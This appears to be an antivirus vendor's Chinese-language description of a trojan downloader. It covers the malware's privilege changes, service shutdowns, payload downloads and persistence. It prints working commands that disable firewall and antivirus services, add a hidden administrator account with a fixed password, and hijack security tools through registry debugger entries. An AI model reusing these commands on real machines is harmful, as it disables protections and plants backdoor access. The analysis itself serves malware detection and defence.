Win32.Troj.VB.kr.81920

  病毒名稱(中文):
  延遲下載器81920
  病毒別名:
  
  
  威脅級別:
  ★☆☆☆☆
  病毒類型:
  木馬下載器
  病毒長度:
  81920
  影響系統:
  Win9xWinMeWinNTWin2000WinXPWin2003
  
  病毒行爲:
  這是個木馬下載器。它會將自己設爲治理員權限,映像劫持大量的殺毒軟件。然後從指定網址下載大量其它木馬程序。
  1.運行後首先Sleep(),挂起10分鍾。然後下載病毒列表。
  2.cacls.exeC:\Windows\system32\cmd.exe/e/t/geveryone:F
  更改cmd權限爲所有用戶可以執行
  執行cmd.exe/cnetstopwscsvc&
  netstopsharedaccess&
  scconfigsharedaccessstart=disabled&
  scconfigwscsvcstart=disabled&
  netstopKPfwSvc&
  netstopKWatchsvc&
  netstopMcShield&
  netstop"NortonAntiVirusServer
  終止或禁用一些服務
  3.查找並終止以下進程shstat.exe,runiep.exe,ras.exe,MPG4C32.exe,
  imsins.exe,Iparmor.exe,360safe.exe,360tray.exe,kmailmon.exe,
  kavstart.exe,cacls.exe,cmd.exe。
  4.查找殺軟ccenter.exe,假如找到下載
  http://ps.go****o.com/rc/1500/rav.jpg
  保存到C:\windows\system32\rav.exe執行。
  rav.exe會生成C:\windows\system32\ressdt.exe
  注冊ressdt.sys驅動,恢複ssdt,然後delressdt.exe
  5.讀取http://ps.go****o.com/rc/1500/gx.txt
  下載的病毒列表,並執行,實際讀出的是0。下載http://ps.go****o.com/rc/1500/gx.jpg
  到本地C:\windows\system32\vbb.exe並執行,這個vbb.exe會下載一些其他的病毒。
  6.寫入注冊表自啓動
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
  \Windows\CurrentVersion\Run\SoundMan
  刪除一下注冊表項
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
  \Windows\CurrentVersion\Run360Safetray
  KavPFW
  vptray
  runeip
  RavTask
  RfwMain
  kav
  7.添加一個用戶new1密碼12369到治理員組
  cmd.exe/cnetusernew112369/add&
  netusernew112369&
  netusernew1/active:yes&
  netlocalgroupadministratorsnew1/add
  8.通過寫入一個1.inf的文件並執行,注冊爲服務啓動,替換原系統服務鍵值
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Service\helpsvc
  原鍵值%SystemRoot%\System32\svchost.exe-knetsvcs
  爲%SystemRoot%\System32\interne.exe
  其執行的語句如下:
  cmd/cecho[Version]>%windir%\1.inf&
  echoSignature="$WINDOWSNT$">>%windir%\1.inf&
  echo[DefaultInstall.Services]>>%windir%\1.inf&
  ...
  (略去數行)
  9.新建鍵值
  HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1=0
  10.映像劫持,導致一些安全工具打不開。
  把HKLM\SoftWare\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptionscftmon.exe\debugger=soundman.exe
  360tray.exe=svchost.exe
  360safe.exe=svchost.exe
  360Loader.exe=svchost.exe
  kmailmon=svchost.exe
  IceSword=svchost.exe
  runiep=svchost.exe
  ras=svchost.exe
  Iparamor.exe=svchost.exe
  taskmgr.exe=svchost.exe
  11.屏蔽隱藏文件的選項
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue